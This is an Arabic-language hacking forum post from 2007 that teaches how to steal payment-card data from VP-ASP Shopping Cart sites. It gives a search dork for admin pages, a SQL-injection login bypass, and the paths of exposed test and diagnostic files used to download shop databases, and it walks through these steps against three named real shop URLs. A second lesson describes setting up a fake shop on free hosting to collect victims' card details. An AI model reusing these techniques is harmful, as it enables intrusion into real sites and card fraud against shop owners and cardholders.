السلام عليكم ورحمة الله وبركاته
ازيكم عاملين ايه ؟؟
انتوا معظمكم عارف يعنى ايه ميمو هاكر او هوه بيعمل ايه فى الهاكرز
والباقيين مش عارفين معنى ميمو هاكرز وانا هعرف نفسى
انا ميمو هاكر الهاكر المصرى الأوحد فى شباب جيله
يعنى انا من اوائل من احب عالم الهاكرز ولذلك تميزت فيه وسبب تميزى ان الواحد لازم يتعلم كل حاجة
يعنى انا مش اول ما اتولدت طلعت هاكرز ومش عيب ان الواحد يتعلم بس العيب انه ينكر انه اتعلم
المهم ندخل فى الموضوع
أول شئ روح لمواقع البحث
www.google.com
www.yahoo.com
------------------------------------------
ابحث عن هذه الكلمه الاتيه
inurl:shopadmin.asp
بعد ظهور المواقع الشوبينج
هنجرب 3 ثغرات واكيد كل المواقع من نوع VP-ASP Shopping Cart يمكن اختراقها او تحميل قواعد البيانات
اللي عليه الفيزا
-------------------------------------------
الثغره الاول
عن طريق كتابه في الاسم و باسورد الادمن
'or''='
الثغراه الثانيه هي في ملف
shopdbtest.asp
---------------------------
الثغره الثالثه
diag_dbtest.asp
-----------------------------------------
بدايه الدرس : هنطبق علي 3 مواقع شوبينج تم اختيرهم من طريق البحث السابقه
http://www.dieugenio.com/consignment/shopadmin.asp
http://www.erboristerialaurora.com/shopadmin.asp
http://fiberopticstuff.com/shopadmin.asp
----------------------------------------------------------------
اول شئ هجرب علي الموقع الثغره الاول
'or''='
http://www.dieugenio.com/consignment/shopadmin.asp
وهي ثغره في نظام 4 VP-ASP Shopping Cart
--------------------------------------------------------------
استخدام الثغره الثانيه
shopdbtest.asp
علي الموقع الاتي
http://www.erboristerialaurora.com/shopadmin.asp
بعد رفض الدخول بالثغره الاول
يظهر ليك الصفح دي
امسح كلمة shopadmin.asp وكتب بدلها shopdbtest.asp
هذه مثل
http://www.erboristerialaurora.com/shopadmin.asp
http://www.erboristerialaurora.com/shopdbtest.asp
الان هنشل كلمه shopdbtest.asp ونضع هنوان قاعد البيانات shopping.mdb
مثل
http://www.erboristerialaurora.com/shopdbtest.asp
http://www.erboristerialaurora.com/shopping.mdb
لان مبروك عليك تحميل قاعده بيانات الان
----------------------------------------------------
شرح الثغره الثالثه
http://fiberopticstuff.com/shopadmin.asp
بعد تجريب الثغره الاول و الثانيه هيتم رف الدخول شئ بعمل
يم مسح كلمه shopadmin.asp ونضع مكنها diag_dbtest.asp
http://fiberopticstuff.com/shopadmin.asp
http://fiberopticstuff.com/diag_dbtest.asp
لان هيظهر هذه الصفحه
بعد معرفت عنوان قاعد البيانات هنغير العنوان الي القاعده
هيتم مسح كلمه diag_dbtest.asp ونضع عنوان القاعده
http://fiberopticstuff.com/diag_dbtest.asp
http://fiberopticstuff.com/shopping500.mdb
مبروك علي تحميل القاعده
------------------------------------------------------------------------------------------------------
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $
------------------------------------------------------------------------------------------------------
الدرس الثاني
كيف كشف ثغره المواقع الشوبينج بنفسك
واستخدام موقع شخصي لخداع الضحايه وجلب الفيزات
VP-ASP Shopping Cart
الان اذهب الي الموقع الرسمي
http://www.vpasp.com
وحمل نسخه برنامج VP-ASP Shopping Cart المجاني
بعد التحميل فك ضغط البرنامج ودخل عليه
الان دور علي اي ملف به كلمه test
بعد البحث في الصاده برنامج الشوبينج 5 تم وجود ملف
طيب الان بعد تحميل البرنامج متسحش البرنامج ولكن استفيد منه عن طريق رفع البرنامج الي موقع يدعم asp
واعمله لبيع الافلام و الاغاني ولم تخترق واحد افتح الموقع اكتير من مره علي شان يشترك وانت تاخود الفيزا
شرح كيف تنزيل صادرت الشوبينج علي الموقع
اشترك في موقع هذه
http://europe.webmatrixhosting.net/
هذه هو اقوي موقع استضافه لل asp
شرح عمل ملف Shop$config.asp
لان ادخل علي هذه الملف عن طرق برنامج Notepad
الان ارفع الملف الي الموقع بياعك وكتب كلمه
install.asp
اتبع التعليمات وهيكون عندك موقع وهمي لسرقه الفيزا
والسلام ختام
موضوع: درس عملى لتعلم كيفيه سرقه visa mastercard ............... 
الإثنين نوفمبر 12, 2007 2:59 am
